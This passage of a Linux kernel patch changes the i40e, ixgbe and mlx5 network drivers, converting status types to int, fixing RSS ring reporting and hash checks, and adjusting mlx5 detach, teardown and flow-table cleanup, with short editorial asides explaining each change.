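[Editorial aside, not part of the patch: the i40e_status.h hunk above deletes dozens of never-referenced I40E_ERR_* entries. Because every surviving code carries an explicit initializer, the remaining values are unchanged even though the list is now sparse, so logged and compared status numbers stay stable. A small sketch with a stand-in enum (demo_status_code, hypothetical) illustrates the point.]

	/* Editorial sketch: explicit initializers make the enum robust to
	 * deletions; the names mirror a few survivors from i40e_status.h.
	 */
	#include <assert.h>

	enum demo_status_code {
		DEMO_SUCCESS       = 0,
		DEMO_ERR_NVM       = -1,
		/* -3, -6..-9, ... removed by the patch */
		DEMO_ERR_PARAM     = -5,
		DEMO_ERR_TIMEOUT   = -37,
		DEMO_NOT_SUPPORTED = -64,
	};

	int main(void)
	{
		assert(DEMO_ERR_TIMEOUT == -37); /* value stable despite gaps */
		return 0;
	}
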
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 635f93d603186..cb7cf672f6971 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -17,7 +17,7 @@
+  **/
+ static void i40e_vc_vf_broadcast(struct i40e_pf *pf,
+ 				 enum virtchnl_ops v_opcode,
+-				 i40e_status v_retval, u8 *msg,
++				 int v_retval, u8 *msg,
+ 				 u16 msglen)
+ {
+ 	struct i40e_hw *hw = &pf->hw;
+@@ -1246,13 +1246,13 @@ err:
+  * @vl: List of VLANs - apply filter for given VLANs
+  * @num_vlans: Number of elements in @vl
+  **/
+-static i40e_status
++static int
+ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 		     bool unicast_enable, s16 *vl, u16 num_vlans)
+ {
+-	i40e_status aq_ret, aq_tmp = 0;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
++	int aq_ret, aq_tmp = 0;
+ 	int i;
+ 
+ 	/* No VLAN to set promisc on, set on VSI */
+@@ -1264,9 +1264,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			return aq_ret;
+@@ -1280,9 +1280,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 		}
+ 
+@@ -1297,9 +1297,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set multicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set multicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1313,9 +1313,9 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+ 			int aq_err = pf->hw.aq.asq_last_status;
+ 
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d failed to set unicast promiscuous mode err %s aq_err %s\n",
++				"VF %d failed to set unicast promiscuous mode err %d aq_err %s\n",
+ 				vf->vf_id,
+-				i40e_stat_str(&pf->hw, aq_ret),
++				aq_ret,
+ 				i40e_aq_str(&pf->hw, aq_err));
+ 
+ 			if (!aq_tmp)
+@@ -1339,13 +1339,13 @@ i40e_set_vsi_promisc(struct i40e_vf *vf, u16 seid, bool multi_enable,
+  * Called from the VF to configure the promiscuous mode of
+  * VF vsis and from the VF reset path to reset promiscuous mode.
+  **/
+-static i40e_status i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
+-						   u16 vsi_id,
+-						   bool allmulti,
+-						   bool alluni)
++static int i40e_config_vf_promiscuous_mode(struct i40e_vf *vf,
++					   u16 vsi_id,
++					   bool allmulti,
++					   bool alluni)
+ {
+-	i40e_status aq_ret = I40E_SUCCESS;
+ 	struct i40e_pf *pf = vf->pf;
++	int aq_ret = I40E_SUCCESS;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_vlans;
+ 	s16 *vl;
+@@ -1955,7 +1955,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+ 	struct i40e_pf *pf;
+ 	struct i40e_hw *hw;
+ 	int abs_vf_id;
+-	i40e_status aq_ret;
++	int aq_ret;
+ 
+ 	/* validate the request */
+ 	if (!vf || vf->vf_id >= vf->pf->num_alloc_vfs)
+@@ -1987,7 +1987,7 @@ static int i40e_vc_send_msg_to_vf(struct i40e_vf *vf, u32 v_opcode,
+  **/
+ static int i40e_vc_send_resp_to_vf(struct i40e_vf *vf,
+ 				   enum virtchnl_ops opcode,
+-				   i40e_status retval)
++				   int retval)
+ {
+ 	return i40e_vc_send_msg_to_vf(vf, opcode, retval, NULL, 0);
+ }
+@@ -2091,9 +2091,9 @@ static int i40e_vc_get_vf_resources_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_vf_resource *vfres = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 	int num_vsis = 1;
++	int aq_ret = 0;
+ 	size_t len = 0;
+ 	int ret;
+ 
+@@ -2221,9 +2221,9 @@ static int i40e_vc_config_promiscuous_mode_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_promisc_info *info =
+ 	    (struct virtchnl_promisc_info *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	bool allmulti = false;
+ 	bool alluni = false;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2308,10 +2308,10 @@ static int i40e_vc_config_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_pair_info *qpi;
+ 	u16 vsi_id, vsi_queue_id = 0;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
+ 	int i, j = 0, idx = 0;
+ 	struct i40e_vsi *vsi;
+ 	u16 num_qps_all = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2458,8 +2458,8 @@ static int i40e_vc_config_irq_map_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_irq_map_info *irqmap_info =
+ 	    (struct virtchnl_irq_map_info *)msg;
+ 	struct virtchnl_vector_map *map;
++	int aq_ret = 0;
+ 	u16 vsi_id;
+-	i40e_status aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -2574,7 +2574,7 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+@@ -2632,7 +2632,7 @@ static int i40e_vc_disable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct virtchnl_queue_select *vqs =
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -2783,7 +2783,7 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_queue_select *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_eth_stats stats;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	struct i40e_vsi *vsi;
+ 
+ 	memset(&stats, 0, sizeof(struct i40e_eth_stats));
+@@ -2926,7 +2926,7 @@ static int i40e_vc_add_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_ether_addr_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -2998,7 +2998,7 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 	bool was_unimac_deleted = false;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3071,7 +3071,7 @@ static int i40e_vc_add_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if ((vf->num_vlan >= I40E_VC_MAX_VLAN_PER_VF) &&
+@@ -3142,7 +3142,7 @@ static int i40e_vc_remove_vlan_msg(struct i40e_vf *vf, u8 *msg)
+ 	    (struct virtchnl_vlan_filter_list *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3198,7 +3198,7 @@ static int i40e_vc_iwarp_msg(struct i40e_vf *vf, u8 *msg, u16 msglen)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+ 	int abs_vf_id = vf->vf_id + pf->hw.func_caps.vf_base_id;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3227,7 +3227,7 @@ static int i40e_vc_iwarp_qvmap_msg(struct i40e_vf *vf, u8 *msg, bool config)
+ {
+ 	struct virtchnl_iwarp_qvlist_info *qvlist_info =
+ 				(struct virtchnl_iwarp_qvlist_info *)msg;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states) ||
+ 	    !test_bit(I40E_VF_STATE_IWARPENA, &vf->vf_states)) {
+@@ -3263,7 +3263,7 @@ static int i40e_vc_config_rss_key(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_key *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+ 	    !i40e_vc_isvalid_vsi_id(vf, vrk->vsi_id) ||
+@@ -3293,7 +3293,7 @@ static int i40e_vc_config_rss_lut(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_lut *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u16 i;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE) ||
+@@ -3328,7 +3328,7 @@ static int i40e_vc_get_rss_hena(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct virtchnl_rss_hena *vrh = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int len = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3365,7 +3365,7 @@ static int i40e_vc_set_rss_hena(struct i40e_vf *vf, u8 *msg)
+ 		(struct virtchnl_rss_hena *)msg;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3389,8 +3389,8 @@ err:
+  **/
+ static int i40e_vc_enable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3415,8 +3415,8 @@ err:
+  **/
+ static int i40e_vc_disable_vlan_stripping(struct i40e_vf *vf, u8 *msg)
+ {
+-	i40e_status aq_ret = 0;
+ 	struct i40e_vsi *vsi;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
+@@ -3615,8 +3615,8 @@ static void i40e_del_all_cloud_filters(struct i40e_vf *vf)
+ 			ret = i40e_add_del_cloud_filter(vsi, cfilter, false);
+ 		if (ret)
+ 			dev_err(&pf->pdev->dev,
+-				"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-				vf->vf_id, i40e_stat_str(&pf->hw, ret),
++				"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++				vf->vf_id, ret,
+ 				i40e_aq_str(&pf->hw,
+ 					    pf->hw.aq.asq_last_status));
+ 
+@@ -3642,7 +3642,7 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+ 	struct hlist_node *node;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3718,8 +3718,8 @@ static int i40e_vc_del_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, &cfilter, false);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to delete cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to delete cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err;
+ 	}
+@@ -3773,7 +3773,7 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_cloud_filter *cfilter = NULL;
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_vsi *vsi = NULL;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	int i, ret;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3852,8 +3852,8 @@ static int i40e_vc_add_cloud_filter(struct i40e_vf *vf, u8 *msg)
+ 		ret = i40e_add_del_cloud_filter(vsi, cfilter, true);
+ 	if (ret) {
+ 		dev_err(&pf->pdev->dev,
+-			"VF %d: Failed to add cloud filter, err %s aq_err %s\n",
+-			vf->vf_id, i40e_stat_str(&pf->hw, ret),
++			"VF %d: Failed to add cloud filter, err %d aq_err %s\n",
++			vf->vf_id, ret,
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		goto err_free;
+ 	}
+@@ -3882,7 +3882,7 @@ static int i40e_vc_add_qch_msg(struct i40e_vf *vf, u8 *msg)
+ 	struct i40e_pf *pf = vf->pf;
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	int i, adq_request_qps = 0;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 	u64 speed = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+@@ -3994,7 +3994,7 @@ err:
+ static int i40e_vc_del_qch_msg(struct i40e_vf *vf, u8 *msg)
+ {
+ 	struct i40e_pf *pf = vf->pf;
+-	i40e_status aq_ret = 0;
++	int aq_ret = 0;
+ 
+ 	if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE)) {
+ 		aq_ret = I40E_ERR_PARAM;
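
Note: the long run of i40e hunks above is one mechanical conversion: the driver-private i40e_status typedef becomes plain int, declarations are re-sorted to keep the longest-line-first ordering, and the matching dev_err() calls switch from i40e_stat_str() to a plain %d. A minimal sketch of the resulting handler shape, compiled against the driver's own headers - the function name is made up, but i40e_sync_vf_state(), I40E_VF_STATE_ACTIVE and I40E_ERR_PARAM are the driver's real identifiers:

    static int i40e_vc_example_msg(struct i40e_vf *vf)
    {
            int aq_ret = 0;         /* was: i40e_status aq_ret = 0; */

            if (!i40e_sync_vf_state(vf, I40E_VF_STATE_ACTIVE))
                    aq_ret = I40E_ERR_PARAM;

            /* failure paths now print the raw int:
             * dev_err(dev, "... err %d aq_err %s\n", aq_ret, ...);
             */
            return aq_ret;
    }
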
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+index 6cfc9dc165378..0bbad4a5cc2f5 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_ethtool.c
+@@ -2665,6 +2665,14 @@ static int ixgbe_get_rss_hash_opts(struct ixgbe_adapter *adapter,
+ 	return 0;
+ }
+ 
++static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
++{
++	if (adapter->hw.mac.type < ixgbe_mac_X550)
++		return 16;
++	else
++		return 64;
++}
++
+ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 			   u32 *rule_locs)
+ {
+@@ -2673,7 +2681,8 @@ static int ixgbe_get_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd,
+ 
+ 	switch (cmd->cmd) {
+ 	case ETHTOOL_GRXRINGS:
+-		cmd->data = adapter->num_rx_queues;
++		cmd->data = min_t(int, adapter->num_rx_queues,
++				  ixgbe_rss_indir_tbl_max(adapter));
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+@@ -3075,14 +3084,6 @@ static int ixgbe_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *cmd)
+ 	return ret;
+ }
+ 
+-static int ixgbe_rss_indir_tbl_max(struct ixgbe_adapter *adapter)
+-{
+-	if (adapter->hw.mac.type < ixgbe_mac_X550)
+-		return 16;
+-	else
+-		return 64;
+-}
+-
+ static u32 ixgbe_get_rxfh_key_size(struct net_device *netdev)
+ {
+ 	return IXGBE_RSS_KEY_SIZE;
+@@ -3131,8 +3132,8 @@ static int ixgbe_set_rxfh(struct net_device *netdev, const u32 *indir,
+ 	int i;
+ 	u32 reta_entries = ixgbe_rss_indir_tbl_entries(adapter);
+ 
+-	if (hfunc)
+-		return -EINVAL;
++	if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
++		return -EOPNOTSUPP;
+ 
+ 	/* Fill out the redirection table */
+ 	if (indir) {
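
Note: two separate fixes in this ixgbe hunk. First, ETHTOOL_GRXRINGS is clamped to the RSS indirection-table width (16 entries before X550, 64 after), so userspace is no longer told about rings the table cannot address. Second, set_rxfh stops rejecting every non-zero hfunc and instead accepts both "no change" and Toeplitz. A condensed, hedged sketch of the hfunc check, applicable to any .set_rxfh implementation:

    #include <linux/netdevice.h>
    #include <linux/ethtool.h>

    static int example_set_rxfh(struct net_device *netdev, const u32 *indir,
                                const u8 *key, const u8 hfunc)
    {
            /* ETH_RSS_HASH_NO_CHANGE must be accepted, otherwise
             * "ethtool -X ethN equal 8" (which leaves the hash function
             * untouched) starts failing.
             */
            if (hfunc != ETH_RSS_HASH_NO_CHANGE && hfunc != ETH_RSS_HASH_TOP)
                    return -EOPNOTSUPP;

            /* ... program the indirection table and hash key ... */
            return 0;
    }
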
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dev.c b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+index 0571e40c6ee5f..02bb9d43ff9c4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/dev.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/dev.c
+@@ -396,7 +396,7 @@ int mlx5_attach_device(struct mlx5_core_dev *dev)
+ 	return ret;
+ }
+ 
+-void mlx5_detach_device(struct mlx5_core_dev *dev)
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct mlx5_priv *priv = &dev->priv;
+ 	struct auxiliary_device *adev;
+@@ -426,7 +426,7 @@ void mlx5_detach_device(struct mlx5_core_dev *dev)
+ 
+ 		adrv = to_auxiliary_drv(adev->dev.driver);
+ 
+-		if (adrv->suspend) {
++		if (adrv->suspend && suspend) {
+ 			adrv->suspend(adev, pm);
+ 			continue;
+ 		}
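
Note: the new bool threads a caller decision down to the auxiliary devices: only real power-management transitions may take the aux driver's ->suspend() shortcut, while teardown paths (devlink reinit, shutdown, error recovery) must run the full ->remove(). Reduced to its core, the dispatch looks roughly like this sketch; iteration over the device's aux devices is elided:

    #include <linux/auxiliary_bus.h>

    static void detach_one(struct auxiliary_device *adev, bool suspend)
    {
            struct auxiliary_driver *adrv = to_auxiliary_drv(adev->dev.driver);
            pm_message_t pm = {};

            /* Suspend only when the caller really is suspending; a devlink
             * reload that merely suspended its aux devices would resume
             * into stale state instead of reinitializing.
             */
            if (adrv->suspend && suspend) {
                    adrv->suspend(adev, pm);
                    return;
            }

            if (adrv->remove)
                    adrv->remove(adev);
    }
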
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+index 5bd83c0275f82..2370e9ad52ea9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/devlink.c
+@@ -104,7 +104,7 @@ static int mlx5_devlink_reload_fw_activate(struct devlink *devlink, struct netli
+ 	if (err)
+ 		return err;
+ 
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, true);
+ 	err = mlx5_health_wait_pci_up(dev);
+ 	if (err)
+ 		NL_SET_ERR_MSG_MOD(extack, "FW activate aborted, PCI reads fail after reset");
+@@ -162,7 +162,7 @@ static int mlx5_devlink_reload_down(struct devlink *devlink, bool netns_change,
+ 
+ 	switch (action) {
+ 	case DEVLINK_RELOAD_ACTION_DRIVER_REINIT:
+-		mlx5_unload_one_devl_locked(dev);
++		mlx5_unload_one_devl_locked(dev, false);
+ 		break;
+ 	case DEVLINK_RELOAD_ACTION_FW_ACTIVATE:
+ 		if (limit == DEVLINK_RELOAD_LIMIT_NO_RESET)
+@@ -196,7 +196,7 @@ static int mlx5_devlink_reload_up(struct devlink *devlink, enum devlink_reload_a
+ 			break;
+ 		/* On fw_activate action, also driver is reloaded and reinit performed */
+ 		*actions_performed |= BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT);
+-		ret = mlx5_load_one_devl_locked(dev, false);
++		ret = mlx5_load_one_devl_locked(dev, true);
+ 		break;
+ 	default:
+ 		/* Unsupported action should not get to this function */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+index 4e48946c4c2ac..0290e0dea5390 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.c
+@@ -106,22 +106,17 @@ err_rule:
+ }
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr)
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr)
+ {
+-	u32 attr_sz = ns_to_attr_sz(post_act->ns_type);
+ 	struct mlx5e_post_act_handle *handle;
+-	struct mlx5_flow_attr *post_attr;
+ 	int err;
+ 
+ 	handle = kzalloc(sizeof(*handle), GFP_KERNEL);
+-	post_attr = mlx5_alloc_flow_attr(post_act->ns_type);
+-	if (!handle || !post_attr) {
+-		kfree(post_attr);
++	if (!handle) {
+ 		kfree(handle);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	memcpy(post_attr, attr, attr_sz);
+ 	post_attr->chain = 0;
+ 	post_attr->prio = 0;
+ 	post_attr->ft = post_act->ft;
+@@ -145,7 +140,6 @@ mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *at
+ 	return handle;
+ 
+ err_xarray:
+-	kfree(post_attr);
+ 	kfree(handle);
+ 	return ERR_PTR(err);
+ }
+@@ -164,7 +158,6 @@ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_han
+ 	if (!IS_ERR_OR_NULL(handle->rule))
+ 		mlx5e_tc_post_act_unoffload(post_act, handle);
+ 	xa_erase(&post_act->ids, handle->id);
+-	kfree(handle->attr);
+ 	kfree(handle);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+index f476774c0b75d..40b8df184af51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/post_act.h
+@@ -19,7 +19,7 @@ void
+ mlx5e_tc_post_act_destroy(struct mlx5e_post_act *post_act);
+ 
+ struct mlx5e_post_act_handle *
+-mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *attr);
++mlx5e_tc_post_act_add(struct mlx5e_post_act *post_act, struct mlx5_flow_attr *post_attr);
+ 
+ void
+ mlx5e_tc_post_act_del(struct mlx5e_post_act *post_act, struct mlx5e_post_act_handle *handle);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+index f2c2c752bd1c3..c57b097275241 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc/sample.c
+@@ -14,10 +14,10 @@
+ 
+ #define MLX5_ESW_VPORT_TBL_SIZE_SAMPLE (64 * 1024)
+ 
+-static const struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
++static struct esw_vport_tbl_namespace mlx5_esw_vport_tbl_sample_ns = {
+ 	.max_fte = MLX5_ESW_VPORT_TBL_SIZE_SAMPLE,
+ 	.max_num_groups = 0,    /* default num of groups */
+-	.flags = MLX5_FLOW_TABLE_TUNNEL_EN_REFORMAT | MLX5_FLOW_TABLE_TUNNEL_EN_DECAP,
++	.flags = 0,
+ };
+ 
+ struct mlx5e_tc_psample {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+index 7cd36f4ac3efc..eba601487eb79 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs.c
+@@ -776,6 +776,7 @@ static int mlx5e_create_promisc_table(struct mlx5e_flow_steering *fs)
+ 	ft->t = mlx5_create_auto_grouped_flow_table(fs->ns, &ft_attr);
+ 	if (IS_ERR(ft->t)) {
+ 		err = PTR_ERR(ft->t);
++		ft->t = NULL;
+ 		fs_err(fs, "fail to create promisc table err=%d\n", err);
+ 		return err;
+ 	}
+@@ -803,7 +804,7 @@ static void mlx5e_del_promisc_rule(struct mlx5e_flow_steering *fs)
+ 
+ static void mlx5e_destroy_promisc_table(struct mlx5e_flow_steering *fs)
+ {
+-	if (WARN(!fs->promisc.ft.t, "Trying to remove non-existing promiscuous table"))
++	if (!fs->promisc.ft.t)
+ 		return;
+ 	mlx5e_del_promisc_rule(fs);
+ 	mlx5_destroy_flow_table(fs->promisc.ft.t);
+@@ -1471,6 +1472,8 @@ err:
+ 
+ void mlx5e_fs_cleanup(struct mlx5e_flow_steering *fs)
+ {
++	if (!fs)
++		return;
+ 	mlx5e_fs_ethtool_free(fs);
+ 	mlx5e_fs_tc_free(fs);
+ 	mlx5e_fs_vlan_free(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
